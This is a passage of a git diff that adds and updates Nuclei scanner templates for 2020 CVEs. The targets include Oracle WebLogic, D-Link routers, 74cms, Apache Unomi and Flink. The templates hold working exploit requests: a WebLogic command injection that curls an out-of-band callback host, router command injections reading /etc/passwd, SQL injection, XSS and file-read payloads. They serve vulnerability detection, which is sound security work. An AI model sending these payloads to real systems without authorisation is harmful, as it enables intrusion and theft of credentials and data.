Remote Code Execution in Apache Unomi. Apache Unomi allows conditions to use OGNL and MVEL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. - This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later. - - References: + This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13942 + - http://unomi.apache.org./security/cve-2020-13942.txt + - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E + remediation: Apache Unomi users should upgrade to 1.5.2 or later. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13942 + cwe-id: CWE-74 + tags: cve,cve2020,apache,rce requests: - method: POST path: - "{{BaseURL}}/context.json" - - "{{BaseURL}}:8181/context.json" headers: Content-Type: application/json body: | @@ -41,20 +48,24 @@ requests: ], "sessionId": "nuclei" } + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "context-profile-id" - condition: and - part: header - type: regex + part: body regex: - "(profile|session)(Id|Properties|Segments)" - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" condition: and - part: body \ No newline at end of file + + - type: word + part: header + words: + - "application/json" + - "context-profile-id" + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2020-14413.yaml b/poc/cve/cve-2020-14413.yaml new file mode 100644 index 0000000000..c1fef5a335 --- /dev/null +++ b/poc/cve/cve-2020-14413.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-14413 + +info: + name: NeDi 1.9C XSS + author: pikpikcu + severity: medium + description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily + bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + reference: + - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 + tags: cve,cve2020,nedi,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/poc/cve/cve-2020-14750.yaml b/poc/cve/cve-2020-14750.yaml index 14f1c528fe..fc9e6d83c2 100644 --- a/poc/cve/cve-2020-14750.yaml +++ b/poc/cve/cve-2020-14750.yaml @@ -1,34 +1,42 @@ id: CVE-2020-14750 info: - name: Oracle WebLogic Server - Remote Code Execution + name: Oracle WebLogic Server - Remote Command Execution author: princechaddha,DhiyaneshDk severity: critical description: | - This Security Alert addresses CVE-2020-14750, a remote code execution vulnerability in Oracle WebLogic Server. - This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update. - It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. + Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://github.com/pprietosanchez/CVE-2020-14750 - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750 - https://nvd.nist.gov/vuln/detail/CVE-2020-14750 + - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 + epss-score: 0.97544 + epss-percentile: 0.99996 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: oracle + product: fusion_middleware shodan-query: http.html:"Weblogic Application Server" - verified: "true" - tags: cve,cve2020,rce,oracle,weblogic,unauth,kev + tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm -requests: +http: - raw: - | @timeout: 10s POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.79.1 Accept: */* cmd: curl {{interactsh-url}} Content-Type: application/x-www-form-urlencoded @@ -53,7 +61,7 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" @@ -66,3 +74,4 @@ requests: part: body regex: - '(.*)' +# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-16920.yaml b/poc/cve/cve-2020-16920.yaml new file mode 100644 index 0000000000..9ee424ed7d --- /dev/null +++ b/poc/cve/cve-2020-16920.yaml @@ -0,0 +1,70 @@ +id: CVE-2019-16920 + +info: + name: D-Link Routers - Remote Code Execution + author: dwisiswant0 + severity: critical + description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-16920 + - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + - https://fortiguard.com/zeroday/FG-VD-19-117 + - https://www.seebug.org/vuldb/ssvid-98079 + - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 + epss-score: 0.96307 + epss-percentile: 0.99507 + cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: dlink + product: dir-655_firmware + tags: cve2019,cve,dlink,rce,router,unauth,kev + +http: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200 +# digest: 490a0046304402205bd1c811f20a4e5f920c3f544f1d69b4a68699c8aacf72059425ae3b99891e2602200d3bb9646a016bf7121e2ce0bfaa71a950182aeed674967fd41119b0976d5907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-17519.yaml b/poc/cve/cve-2020-17519.yaml index 926d6f1974..1585625f0b 100644 --- a/poc/cve/cve-2020-17519.yaml +++ b/poc/cve/cve-2020-17519.yaml @@ -2,11 +2,20 @@ id: CVE-2020-17519 info: name: Apache Flink directory traversal - author: pd-team + author: pdteam severity: high description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. - - # Source: https://github.com/B1anda0/CVE-2020-17519 + reference: + - https://github.com/B1anda0/CVE-2020-17519 + - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E + - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E + - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 + tags: cve,cve2020,apache,lfi,flink requests: - method: GET @@ -19,5 +28,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/poc/cve/cve-2020-17530.yaml b/poc/cve/cve-2020-17530.yaml index 38f8bbbfaa..c39f87389c 100644 --- a/poc/cve/cve-2020-17530.yaml +++ b/poc/cve/cve-2020-17530.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - tags: cve,cve2020,apache,rce,struts,kev + tags: cve,cve2020,apache,rce,struts requests: - method: GET diff --git a/poc/cve/cve-2020-20988.yaml b/poc/cve/cve-2020-20988.yaml index 6672172c5b..07f450bdb6 100644 --- a/poc/cve/cve-2020-20988.yaml +++ b/poc/cve/cve-2020-20988.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://mycvee.blogspot.com/p/xss2.html - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 @@ -14,11 +18,17 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20988 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.37789 + cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2020,domainmod,xss,authenticated + verified: true + max-request: 2 + vendor: domainmod + product: domainmod + tags: cve2020,cve,domainmod,xss,authenticated -requests: +http: - raw: - | POST / HTTP/1.1 @@ -33,17 +43,14 @@ requests: daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - cookie-reuse: true - req-condition: true - redirects: true + host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "value=\"\"/>")' - 'contains(body_2, "DomainMOD")' condition: and - -# Enhanced by mp on 2022/08/14 +# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-22209.yaml b/poc/cve/cve-2020-22209.yaml new file mode 100644 index 0000000000..0b164d90aa --- /dev/null +++ b/poc/cve/cve-2020-22209.yaml @@ -0,0 +1,47 @@ +id: CVE-2020-22209 + +info: + name: 74cms - ajax_common.php SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file. + reference: + - https://github.com/blindkey/cve_like/issues/12 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22209 + - https://github.com/20142995/sectool + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22209 + cwe-id: CWE-89 + epss-score: 0.15522 + epss-percentile: 0.95775 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: 74cms + product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" + tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27' + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-22210.yaml b/poc/cve/cve-2020-22210.yaml new file mode 100644 index 0000000000..5002d18314 --- /dev/null +++ b/poc/cve/cve-2020-22210.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-22210 + +info: + name: 74cms - ajax_officebuilding.php SQL Injection + author: ritikchaddha + severity: critical + description: | + A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. + reference: + - https://github.com/blindkey/cve_like/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22210 + cwe-id: CWE-89 + epss-score: 0.20254 + epss-percentile: 0.95933 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: 74cms + product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" + tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-23015.yaml b/poc/cve/cve-2020-23015.yaml index d01da81880..97f4de8c09 100644 --- a/poc/cve/cve-2020-23015.yaml +++ b/poc/cve/cve-2020-23015.yaml @@ -8,12 +8,12 @@ info: reference: - https://github.com/opnsense/core/issues/4061 - https://www.cvedetails.com/cve/CVE-2020-23015 - tags: cve,cve2020,redirect,opnsense classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-23015 cwe-id: CWE-601 + tags: cve,cve2020,redirect,opnsense requests: - method: GET @@ -23,6 +23,6 @@ requests: matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' \ No newline at end of file diff --git a/poc/cve/cve-2020-24579.yaml b/poc/cve/cve-2020-24579.yaml index dfc9858c10..98bea02cd2 100644 --- a/poc/cve/cve-2020-24579.yaml +++ b/poc/cve/cve-2020-24579.yaml @@ -1,31 +1,21 @@ id: CVE-2020-24579 info: - name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution + name: D-Link DSL 2888a - Remote Command Execution author: pikpikcu severity: high - description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. - remediation: | - Apply the latest firmware update provided by D-Link to fix the vulnerability. + description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-24579 classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.02322 - epss-percentile: 0.88548 - cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: dlink - product: dsl2888a_firmware tags: cve,cve2020,dlink,rce -http: +requests: - raw: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 @@ -33,6 +23,7 @@ http: Cookie: uid=6gPjT2ipmNz username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b + - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} @@ -40,13 +31,12 @@ http: matchers-condition: and matchers: + - type: status + status: + - 200 + - type: regex regex: - "nobody:[x*]:65534:65534" - "root:.*:0:0:" condition: or - - - type: status - status: - - 200 -# digest: 4a0a00473045022100a69c2a5153c5277c8eaf8c22c0761a3ca0f649271a4d84b0d4a88674daad6a6e02205a4b85e41ea49153f49fab09da3e57ad15a447491f67b87567408abab28fc606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-25223.yaml b/poc/cve/cve-2020-25223.yaml index 2de4a5f82a..b8f310742c 100644 --- a/poc/cve/cve-2020-25223.yaml +++ b/poc/cve/cve-2020-25223.yaml @@ -9,9 +9,10 @@ info: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 - https://nvd.nist.gov/vuln/detail/CVE-2020-25223 + - https://community.sophos.com/b/security-blog classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-25223 tags: cve,cve2020,sophos,rce,oast,unauth diff --git a/poc/cve/cve-2020-25540.yaml b/poc/cve/cve-2020-25540.yaml index bbb3f29336..09ea481ed3 100644 --- a/poc/cve/cve-2020-25540.yaml +++ b/poc/cve/cve-2020-25540.yaml @@ -1,12 +1,21 @@ id: CVE-2020-25540 -info: +info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium - description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. - - # Reference:- https://www.exploit-db.com/exploits/48812 + severity: high + description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + reference: + - https://www.exploit-db.com/exploits/48812 + - https://github.com/zoujingli/ThinkAdmin/issues/244 + - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/ + - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 + tags: cve,cve2020,thinkadmin,lfi requests: - method: GET @@ -20,4 +29,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/cve/cve-2020-25780.yaml b/poc/cve/cve-2020-25780.yaml index 3017afb630..c85c8fac4e 100644 --- a/poc/cve/cve-2020-25780.yaml +++ b/poc/cve/cve-2020-25780.yaml @@ -4,16 +4,17 @@ info: name: Commvault CommCell Directory Traversal author: pdteam severity: high - tags: cve,cve2020,commvault,lfi description: In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead view a file outside of the log-files folder. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-25780 - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html + - http://kb.commvault.com/article/63264 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 + tags: cve,cve2020,commvault,lfi requests: - method: POST diff --git a/poc/cve/cve-2020-26919.yaml b/poc/cve/cve-2020-26919.yaml index f7e7ceacc4..f20753ee21 100644 --- a/poc/cve/cve-2020-26919.yaml +++ b/poc/cve/cve-2020-26919.yaml @@ -4,14 +4,15 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: "NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands." + description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26919 + - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-26919 tags: cve,cve2020,netgear,rce,oast,router,unauth diff --git a/poc/cve/cve-2020-27735.yaml b/poc/cve/cve-2020-27735.yaml index 1872a84f50..d41f8d89b4 100644 --- a/poc/cve/cve-2020-27735.yaml +++ b/poc/cve/cve-2020-27735.yaml @@ -1,15 +1,15 @@ id: CVE-2020-27735 info: - name: Wing FTP 6.4.4 - Cross-Site Scripting + name: Wing FTP's Web Interface XSS author: pikpikcu severity: medium description: | - Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 - https://www.wftpserver.com/serverhistory.htm - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,7 +20,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" + - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" matchers-condition: and matchers: @@ -37,5 +37,3 @@ requests: part: header words: - text/html - -# Enhanced by mp on 2022/08/14 diff --git a/poc/cve/cve-2020-27986.yaml b/poc/cve/cve-2020-27986.yaml new file mode 100644 index 0000000000..b59fc6a4bb --- /dev/null +++ b/poc/cve/cve-2020-27986.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-27986 + +info: + name: SonarQube unauth + author: pikpikcu + severity: high + description: | + SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, + SVN, and GitLab credentials via the api/settings/values URI. + NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." + reference: + - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 + tags: cve,cve2020,sonarqube + +requests: + - method: GET + path: + - "{{BaseURL}}/api/settings/values" + + matchers-condition: and + matchers: + - type: word + words: + - email.smtp_host.secured + - email.smtp_password.secured + - email.smtp_port.secured + - email.smtp_username.secured + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-28351.yaml b/poc/cve/cve-2020-28351.yaml new file mode 100644 index 0000000000..7695defd90 --- /dev/null +++ b/poc/cve/cve-2020-28351.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + - https://www.mitel.com/articles/what-happened-shoretel-products + - https://github.com/dievus/cve-2020-28351 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 + tags: cve,cve2020,shoretel,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-29227.yaml b/poc/cve/cve-2020-29227.yaml index b22baeb363..2ad1cca8f4 100644 --- a/poc/cve/cve-2020-29227.yaml +++ b/poc/cve/cve-2020-29227.yaml @@ -1,29 +1,34 @@ id: CVE-2020-29227 info: - name: Car Rental Management System 1.0 - Local File Inclusion (LFI) + name: Car Rental Management System 1.0 - Local File Inclusion author: daffainfo severity: critical - description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. + description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 - tags: cve,cve2020,lfi + - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-29227 + tags: cve,cve2020,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?page=/etc/passwd%00" + matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 + +# Enhanced by mp on 2022/05/16 diff --git 